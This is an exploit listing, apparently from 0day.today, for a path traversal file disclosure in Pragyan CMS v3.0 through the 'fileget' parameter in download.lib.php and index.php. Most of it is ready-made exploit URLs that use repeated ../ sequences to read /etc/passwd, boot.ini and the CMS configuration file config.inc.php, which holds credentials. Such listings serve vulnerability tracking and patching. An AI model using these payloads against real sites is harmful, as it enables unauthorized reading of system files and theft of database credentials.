Pragyan CMS v 3.0 Remote File Disclosure

🗓️ 10 Jan 2012 00:00:00Reported by Or4nG.M4NType

zdt🔗 0day.today👁 21 Views

Pragyan CMS v 3.0 Remote File Disclosure in download.lib.php and index.php. Exploits for accessing sensitive files using $_GET['fileget'] parameter

Title   
Pragyan CMS v 3.0 => [Remote File Disclosure]
Author  
Or4nG.M4n
Download
http://space.dl.sourceforge.net/project/pragyan/pragyan/3.0/PragyanCMS-v3.0-beta.tar.bz2
 
vuln
download.lib.php line 16
vuln
index.php line 234
 
$_GET['fileget']
  
exploit  http://localhost/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../  etc/passwd . boot.ini
 
Download Config file
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php



#  0day.today [2018-03-09]  #

10 Jan 2012 00:00Current

7.1High risk

Vulners AI Score7.1